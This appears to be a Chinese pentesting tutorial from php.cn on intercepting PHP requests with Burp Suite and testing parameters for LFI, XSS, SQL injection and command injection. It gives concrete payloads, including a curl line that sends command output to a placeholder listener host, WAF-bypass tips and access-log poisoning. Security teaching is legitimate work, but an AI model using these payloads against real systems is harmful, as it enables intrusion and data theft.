0

0

kali怎么挖php漏洞_通过burpsuite拦截测php参数漏洞【技巧】

看不見的法師

看不見的法師

发布时间:2026-02-01 19:43:01

|

363人浏览过

|

来源于php中文网

原创

需手动配置浏览器代理至Burp的127.0.0.1:8080并确认Proxy监听启用,才能捕获PHP的$_GET/$_POST等参数流转;重点测试id、file、callback等高危参数,注意WAF、PHP配置及前端JS干扰,并结合日志、外带平台等交叉验证漏洞真实性。

kali怎么挖php漏洞_通过burpsuite拦截测php参数漏洞【技巧】

怎么用 Burp Suite 拦截 PHP 请求测参数漏洞

Kali 自带 Burp Suite Community,但默认不自动代理浏览器流量,得手动配。关键不是装工具,而是让 PHP 请求真进 Burp——否则看不到 $_GET$_POST 参数的原始流转。

实操建议:

  • 启动 Burp 后,在 Proxy → Options 里确认 localhost:8080 监听已启用(别选错网卡)
  • 浏览器手动设代理:HTTP/HTTPS 都指向 127.0.0.1:8080;Chrome 推荐用 FoxyProxy 插件切换,避免全局污染
  • 访问目标 PHP 页面(比如 /login.php?user=admin),看 Burp 的 Proxy → HTTP history 是否实时出现请求行——没出现就说明代理没通,不是 Burp 问题,是浏览器或系统代理设置漏了
  • 重点盯 GET 参数(URL 里 ?id=1)、POST body(登录表单提交)、还有容易被忽略的 X-Forwarded-ForReferer 这类头字段,PHP 代码可能直接 echo $_SERVER['HTTP_X_FORWARDED_FOR']

哪些 PHP 参数最常出漏洞

不是所有参数都危险,但以下几类在真实 PHP 应用中高频触发漏洞,且 Burp 里一眼能识别:

  • idpagefileincludeaction 这类名字,大概率对应 include($_GET['page'])fopen($_GET['file']),直接试 ?file=../../etc/passwd?page=php://filter/read=convert.base64-encode/resource=index.php
  • callback 参数常见于 JSONP 接口,PHP 若写成 echo $_GET['callback'] . '(' . json_encode($data) . ')';,就构成 XSS,Burp 里改值为 alert(1) 立刻验证
  • 数字型参数(如 ?order=1)别只测 SQL 注入,先看响应是否随值变化:改 ?order=999999999 返回空?可能后端用了 ORDER BY $order 拼接,且没 intval() 过滤
  • 注意 PHP 特有行为:?id[]=1 会变成数组,若代码用 in_array($_GET['id'], $whitelist) 但没校验类型,可能绕过白名单

为什么有些 PHP 参数在 Burp 里“测不出反应”

不是没漏洞,是请求根本没进 PHP 层,或者 PHP 早把参数过滤/重写了。常见干扰点:

文心大模型
文心大模型

百度飞桨-文心大模型 ERNIE 3.0 文本理解与创作

下载

立即学习PHP免费学习笔记(深入)”;

  • Web 服务器层拦截:Apache 的 mod_security 或 Nginx 的 WAF 规则,会在到达 PHP 前 403 掉 ../php:// 等特征,Burp 看到的是 403 响应,不是 PHP 报错——此时要关 WAF 或换更隐蔽的 payload(比如用 URL 编码绕过)
  • PHP 配置影响:allow_url_include=Offinclude('http://...') 直接失败,magic_quotes_gpc=On(旧版)会自动转义单引号,导致 SQLi payload 失效,这些得先通过 phpinfo() 或报错信息确认环境
  • 前端 JS 拦截:某些登录页用 JS 校验密码长度再发请求,你直接在 Burp 改 POST 数据可能被前端逻辑拒绝,得先禁用 JS 或抓包后重放
  • Burp 的 Scanner 对 PHP 动态参数效果有限,它依赖响应差异判断,而很多 PHP 漏洞(如无回显 SSRF、二次注入)响应完全不变,必须手动构造 + 观察服务端日志或外带平台(如 curl your-collab.com/?d=${HOSTNAME}

测完参数后怎么快速验证是不是真漏洞

别只看 Burp 响应状态码或页面变化,PHP 漏洞常需要交叉验证:

  • 文件读取类(LFI):用 ?file=php://filter/read=convert.base64-encode/resource=/etc/passwd,响应里搜 base64 字符串,解码确认内容——比直接读 passwd 更可靠,因为不依赖文件是否存在,还能绕过 null byte 截断
  • 命令执行类:发 ?cmd=id,响应没回显?立刻开个监听端口nc -lvnp 4444,再发 ?cmd=ping%20-c%201%20127.0.0.1%3B%20curl%20http://your-ip:4444/?a=$(%20id%20),看 nc 是否收到带 uid 的请求
  • SQL 注入:?id=1' and sleep(5)--+ 测延时,但注意 MySQL 5.6+ 默认关闭 sleep() 在普通用户权限下的使用,可换 BENCHMARK(1000000,MD5(1))
  • 最关键一点:PHP 的 error_reporting 常被设为 0,错误不显示,但日志可能开着。如果能控制任意文件写入(比如上传点),优先往 /var/log/apache2/access.log 写 PHP 代码,再包含它——这比盲打稳定得多
实际挖的时候,大部分时间花在确认“这个参数到底有没有被 PHP 代码用上”,而不是 payload 本身。Burp 是眼睛,不是锤子。

热门AI工具

更多
DeepSeek
DeepSeek

幻方量化公司旗下的开源大模型平台

豆包大模型
豆包大模型

字节跳动自主研发的一系列大型语言模型

通义千问
通义千问

阿里巴巴推出的全能AI助手

腾讯元宝
腾讯元宝

腾讯混元平台推出的AI助手

文心一言
文心一言

文心一言是百度开发的AI聊天机器人,通过对话可以生成各种形式的内容。

讯飞写作
讯飞写作

基于讯飞星火大模型的AI写作工具,可以快速生成新闻稿件、品宣文案、工作总结、心得体会等各种文文稿

即梦AI
即梦AI

一站式AI创作平台,免费AI图片和视频生成。

ChatGPT
ChatGPT

最最强大的AI聊天机器人程序,ChatGPT不单是聊天机器人,还能进行撰写邮件、视频脚本、文案、翻译、代码等任务。

相关专题

更多
数据分析工具有哪些
数据分析工具有哪些

数据分析工具有Excel、SQL、Python、R、Tableau、Power BI、SAS、SPSS和MATLAB等。详细介绍:1、Excel,具有强大的计算和数据处理功能;2、SQL,可以进行数据查询、过滤、排序、聚合等操作;3、Python,拥有丰富的数据分析库;4、R,拥有丰富的统计分析库和图形库;5、Tableau,提供了直观易用的用户界面等等。

771

2023.10.12

SQL中distinct的用法
SQL中distinct的用法

SQL中distinct的语法是“SELECT DISTINCT column1, column2,...,FROM table_name;”。本专题为大家提供相关的文章、下载、课程内容,供大家免费下载体验。

329

2023.10.27

SQL中months_between使用方法
SQL中months_between使用方法

在SQL中,MONTHS_BETWEEN 是一个常见的函数,用于计算两个日期之间的月份差。想了解更多SQL的相关内容,可以阅读本专题下面的文章。

350

2024.02.23

SQL出现5120错误解决方法
SQL出现5120错误解决方法

SQL Server错误5120是由于没有足够的权限来访问或操作指定的数据库或文件引起的。想了解更多sql错误的相关内容,可以阅读本专题下面的文章。

1324

2024.03.06

sql procedure语法错误解决方法
sql procedure语法错误解决方法

sql procedure语法错误解决办法:1、仔细检查错误消息;2、检查语法规则;3、检查括号和引号;4、检查变量和参数;5、检查关键字和函数;6、逐步调试;7、参考文档和示例。想了解更多语法错误的相关内容,可以阅读本专题下面的文章。

362

2024.03.06

oracle数据库运行sql方法
oracle数据库运行sql方法

运行sql步骤包括:打开sql plus工具并连接到数据库。在提示符下输入sql语句。按enter键运行该语句。查看结果,错误消息或退出sql plus。想了解更多oracle数据库的相关内容,可以阅读本专题下面的文章。

901

2024.04.07

sql中where的含义
sql中where的含义

sql中where子句用于从表中过滤数据,它基于指定条件选择特定的行。想了解更多where的相关内容,可以阅读本专题下面的文章。

581

2024.04.29

sql中删除表的语句是什么
sql中删除表的语句是什么

sql中用于删除表的语句是drop table。语法为drop table table_name;该语句将永久删除指定表的表和数据。想了解更多sql的相关内容,可以阅读本专题下面的文章。

425

2024.04.29

go语言 注释编码
go语言 注释编码

本专题整合了go语言注释、注释规范等等内容,阅读专题下面的文章了解更多详细内容。

30

2026.01.31

热门下载

更多
网站特效
/
网站源码
/
网站素材
/
前端模板

精品课程

更多
相关推荐
/
热门推荐
/
最新课程
MySQL 教程
MySQL 教程

共48课时 | 2万人学习

MySQL 初学入门(mosh老师)
MySQL 初学入门(mosh老师)

共3课时 | 0.3万人学习

简单聊聊mysql8与网络通信
简单聊聊mysql8与网络通信

共1课时 | 820人学习

关于我们 免责申明 举报中心 意见反馈 讲师合作 广告合作 最新更新
php中文网:公益在线php培训,帮助PHP学习者快速成长!
关注服务号 技术交流群
PHP中文网订阅号
每天精选资源文章推送

Copyright 2014-2026 https://www.php.cn/ All Rights Reserved | php.cn | 湘ICP备2023035733号